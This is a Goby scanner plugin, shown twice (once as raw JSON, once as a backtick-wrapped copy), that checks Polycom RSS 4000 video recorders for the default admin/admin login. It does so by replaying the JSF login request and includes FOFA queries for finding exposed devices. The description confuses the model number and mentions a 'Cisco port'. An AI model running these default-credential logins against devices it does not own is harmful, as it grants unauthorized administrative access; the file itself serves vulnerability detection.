Goby/json/Polycom-RSS-4000-Default-Cr...

{
  "Name": "Polycom RSS 4000 Default Credentials",
  "Description": "The Polycom RSS 2000 administrator 'admin' has a password that is set to the default value of 'admin'. As a result, anyone with access to the Cisco port can trivially gain full access to the machine via arbitrary remote code execution. ",
  "Product": "Polycom-RSS4000",
  "Homepage": "https://www.poly.com/",
  "DisclosureDate": "2012-04-23",
  "Author": "gobysec@gmail.com",
  "FofaQuery": "title=\"Polycom RSS 4000\"",
  "GobyQuery": "title=\"Polycom RSS 4000\"",
  "Level": "3",
  "Impact": "Remote attacker can use this default to control the server.",
  "Recommendation": "It is imperative to change default manufacturer passwords and restrict network access to critical and important systems.",
  "References": [
    "https://fofa.so/"
  ],
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "Tips",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
	{
         "Request": {
           "data_type": "text",
           "follow_redirect": false,
           "method": "GET",
           "uri": "/portal/login.jsf"
         },
         "ResponseTest": {
           "checks": [
             {
               "bz": "",
               "operation": "contains",
               "type": "item",
               "value": "javax.faces.ViewState",
               "variable": "$body"
             }
           ],
           "operation": "AND",
           "type": "group"
         },
		  "SetVariable": [
			"viewstate|lastbody|regex|javax.faces.ViewState\" value=\"(.*?)\""
		  ]
    },
	{
         "Request": {
           "data": "loginForm=loginForm&loginForm%3AuserName=admin&loginForm%3Apassword=admin&loginForm%3Adomain=LOCAL&javax.faces.ViewState={{{viewstate|query_encode}}}&javax.faces.source=loginForm%3AloginBt&javax.faces.partial.event=click&javax.faces.partial.execute=loginForm%3AloginBt%20%40component&javax.faces.partial.render=%40component&org.richfaces.ajax.component=loginForm%3AloginBt&loginForm%3AloginBt=loginForm%3AloginBt&AJAX%3AEVENTS_COUNT=1&javax.faces.partial.ajax=true",
           "data_type": "text",
           "follow_redirect": false,
           "header": {
             "Content-Type": "application/x-www-form-urlencoded",
			 "Faces-Request": "partial/ajax"
           },
           "method": "POST",
           "uri": "/portal/login.jsf"
         },
         "ResponseTest": {
           "checks": [
             {
               "bz": "",
               "operation": "contains",
               "type": "item",
               "value": "checkLogin('')",
               "variable": "$body"
             }
           ],
           "operation": "AND",
           "type": "group"
         },
         "SetVariable": []
    }
  ],
  "ExploitSteps": null,
  "Tags": [
    "defaultaccount", "iot"
  ],
  "CVEIDs": null,
  "CVSSScore": "10.0",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": ["Polycom-RSS4000"]
  },
  "Disable": false
}
auto 2022-11-25 02:08:58 -08:00			`{`
			`"Name": "Polycom RSS 4000 Default Credentials",`
			`"Description": "The Polycom RSS 2000 administrator 'admin' has a password that is set to the default value of 'admin'. As a result, anyone with access to the Cisco port can trivially gain full access to the machine via arbitrary remote code execution. ",`
			`"Product": "Polycom-RSS4000",`
			`"Homepage": "https://www.poly.com/",`
			`"DisclosureDate": "2012-04-23",`
			`"Author": "gobysec@gmail.com",`
			`"FofaQuery": "title=\"Polycom RSS 4000\"",`
			`"GobyQuery": "title=\"Polycom RSS 4000\"",`
			`"Level": "3",`
			`"Impact": "Remote attacker can use this default to control the server.",`
			`"Recommendation": "It is imperative to change default manufacturer passwords and restrict network access to critical and important systems.",`
			`"References": [`
			`"https://fofa.so/"`
			`],`
			`"HasExp": false,`
			`"ExpParams": [],`
			`"ExpTips": {`
			`"Type": "Tips",`
			`"Content": ""`
			`},`
			`"ScanSteps": [`
			`"AND",`
			`{`
			`"Request": {`
			`"data_type": "text",`
			`"follow_redirect": false,`
			`"method": "GET",`
			`"uri": "/portal/login.jsf"`
			`},`
			`"ResponseTest": {`
			`"checks": [`
			`{`
			`"bz": "",`
			`"operation": "contains",`
			`"type": "item",`
			`"value": "javax.faces.ViewState",`
			`"variable": "$body"`
			`}`
			`],`
			`"operation": "AND",`
			`"type": "group"`
			`},`
			`"SetVariable": [`
			`"viewstate\|lastbody\|regex\|javax.faces.ViewState\" value=\"(.*?)\""`
			`]`
			`},`
			`{`
			`"Request": {`
			`"data": "loginForm=loginForm&loginForm%3AuserName=admin&loginForm%3Apassword=admin&loginForm%3Adomain=LOCAL&javax.faces.ViewState={{{viewstate\|query_encode}}}&javax.faces.source=loginForm%3AloginBt&javax.faces.partial.event=click&javax.faces.partial.execute=loginForm%3AloginBt%20%40component&javax.faces.partial.render=%40component&org.richfaces.ajax.component=loginForm%3AloginBt&loginForm%3AloginBt=loginForm%3AloginBt&AJAX%3AEVENTS_COUNT=1&javax.faces.partial.ajax=true",`
			`"data_type": "text",`
			`"follow_redirect": false,`
			`"header": {`
			`"Content-Type": "application/x-www-form-urlencoded",`
			`"Faces-Request": "partial/ajax"`
			`},`
			`"method": "POST",`
			`"uri": "/portal/login.jsf"`
			`},`
			`"ResponseTest": {`
			`"checks": [`
			`{`
			`"bz": "",`
			`"operation": "contains",`
			`"type": "item",`
			`"value": "checkLogin('')",`
			`"variable": "$body"`
			`}`
			`],`
			`"operation": "AND",`
			`"type": "group"`
			`},`
			`"SetVariable": []`
			`}`
			`],`
			`"ExploitSteps": null,`
			`"Tags": [`
			`"defaultaccount", "iot"`
			`],`
			`"CVEIDs": null,`
			`"CVSSScore": "10.0",`
			`"AttackSurfaces": {`
			`"Application": null,`
			`"Support": null,`
			`"Service": null,`
			`"System": null,`
			`"Hardware": ["Polycom-RSS4000"]`
			`},`
			`"Disable": false`
			`}`